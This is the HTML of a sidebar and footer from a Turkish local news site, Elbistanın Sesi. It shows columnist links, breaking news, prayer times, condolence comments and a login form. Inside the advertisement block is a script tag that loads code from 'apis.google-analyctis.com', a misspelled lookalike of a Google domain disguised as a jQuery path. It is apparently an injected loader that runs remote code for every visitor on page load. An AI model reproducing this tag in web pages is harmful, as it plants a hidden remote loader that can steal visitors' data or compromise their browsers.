              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="http://www.elbistaninsesi.com/hayattan-aldigim-bazi-dersler-makale,6138.html" title="HA­YAT­TAN AL­DI­GIM BAZI DERS­LER " >HA­YAT­TAN AL­DI­GIM BAZI DERS­LER </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/igdeye-gelin-makale,6135.html" title="İGDEYE GELİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="http://www.elbistaninsesi.com/igdeye-gelin-makale,6135.html" title="İGDEYE GELİN" >İGDEYE GELİN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/aziz-dost-makale,6129.html" title="AZİZ DOST" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Feyzi-Tasolar_536_1.jpg" alt="Feyzi Taşolar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/24/feyzi-tasolar" title="Feyzi Taşolar">Feyzi Taşolar</a></h4>
              <a href="http://www.elbistaninsesi.com/aziz-dost-makale,6129.html" title="AZİZ DOST" >AZİZ DOST</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/asimin-nesli-makale,6121.html" title="   ASIM’IN NESLİ!..." >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="http://www.elbistaninsesi.com/asimin-nesli-makale,6121.html" title="   ASIM’IN NESLİ!..." >   ASIM’IN NESLİ!...</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/bahar-turkusu-makale,6120.html" title="BAHAR TÜRKÜSÜ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/d985fcce-69b5-47bf-99fe-3c82dc92b125.jpg" alt="Akif DUT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/91/akif-dut" title="Akif DUT">Akif DUT</a></h4>
              <a href="http://www.elbistaninsesi.com/bahar-turkusu-makale,6120.html" title="BAHAR TÜRKÜSÜ" >BAHAR TÜRKÜSÜ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hemsehrimiz-hasan-resit-tankut-ve-elbistan-adinin-gunes-dil-teorisine-gore-tahlili-makale,6111.html" title="Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Omer-Hakan-Ozalp_009_1.jpg" alt="Ömer Hakan Özalp">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/42/omer-hakan-ozalp" title="Ömer Hakan Özalp">Ömer Hakan Özalp</a></h4>
              <a href="http://www.elbistaninsesi.com/hemsehrimiz-hasan-resit-tankut-ve-elbistan-adinin-gunes-dil-teorisine-gore-tahlili-makale,6111.html" title="Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili" >Hemşehrimiz Hasan Reşit Tankut ve ‘Elbistan’ adının Güneş-Dil Teorisi’ne göre tahlili</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-valiligi-artan-vakalara-karsi-uyardi-h69744.html" title="Kahramanmaraş Valiliği artan vakalara karşı uyardı" >Kahramanmaraş Valiliği artan vakalara karşı uyardı</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kiz-cocuguna-cinsel-istismar-iddiasinda-7-supheli-tutuklandi-h69718.html" title="Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı" ><b>Kız çocuğuna cinsel istismar iddiasında 7 şüpheli tutuklandı</b></a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/dusen-helikopterde-afsinli-asker-sehit-oldu-h69425.html" title="Düşen helikopterde Afşinli asker şehit oldu" >Düşen helikopterde Afşinli asker şehit oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-covidle-mucadelede-hassas-bir-doneme-girdik-h68360.html" title="Kaymakam Demir: “Covid’le mücadelede hassas bir döneme girdik”" >Kaymakam Demir: “Covid’le mücadelede hassas bir döneme girdik”</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/rehavete-kapilip-uyarilara-kulak-tikayanlara-ceza-yagdi-h68101.html" title="Rehavete kapılıp uyarılara kulak tıkayanlara ceza yağdı" >Rehavete kapılıp uyarılara kulak tıkayanlara ceza yağdı</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="http://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="http://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>03:35</td>
            <td>05:14</td>
            <td>12:34</td>
            <td>16:24</td>
            <td>19:44</td>
            <td>21:15</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hamit-akcadagli-49-yasinda-h67852.html#comment_349255" title="" >ALLAHIM MEKANINI CENNET EYLESİN KABRİNİ...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html#comment_349254" title="" >ALLAH rahmet eeylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-bedevi-yelegen-h70056.html#comment_349253" title="" >ALLAH rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html#comment_349252" title="" >Allah rahmet etsin.Yakınları ve tüm sevenlerinin...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349251" title="" >Nurlar içinde yatsınlar</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349250" title="" >ALLAH RAHMET Eylesin mekanları cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349249" title="" >Canım Babannem, yerin 14 yıldır dolmadı....</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html#comment_349247" title="" >Mekanı nuru cennet olsun kardeşim.yakinlarina...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html#comment_349245" title="" >Merhuma Allah’tan rahmet; yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349244" title="" >Allah rahmet eylesin, mekânları cennet...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-yalcinoz-76-yasinda-h70043.html#comment_349243" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-yalcinoz-76-yasinda-h70043.html#comment_349242" title="" >ALLAH RAHMET EYLESİN BAŞINIZ SAĞOLSUN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349241" title="" >ALLAH RAHMET EYLESİN MEKANLARI CENNET OLSUN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/museyip-dal-82-yasinda-h70046.html#comment_349240" title="" >ALLAH RAHMET EYLESİN BAŞINIZ SAĞOLSUN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-duran-turan-h70044.html#comment_349239" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-duran-turan-h70044.html#comment_349238" title="" >ALLAH rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-munevver-uluer-fahri-uluer-h70047.html#comment_349237" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mevlit-ozturk-h70042.html#comment_349236" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ayse-yalcinoz-76-yasinda-h70043.html#comment_349235" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-duran-turan-h70044.html#comment_349234" title="" >Allah rahmet eylesin mekani cennet olsun...</a></li>
              </ul>
    </div>
  </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/17-Mayıs-2021.jpg" title="Elbistanın Sesi - 17.05.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_17-Mayıs-2021.jpg" alt="Elbistanın Sesi - 17.05.2021 Manşeti" /></a>
           </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" selected>18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" >27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" selected>Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" >Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Halk Eğitimi Merkezi’nde kurslar yeniden başladı" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4f2a232d263c3b2e2126213c2a3c26282e352a3b2a3c260f28222e2623612c2022">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&amp;rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fhalk-egitimi-merkezinde-kurslar-yeniden-basladi-h70061.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('70061', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
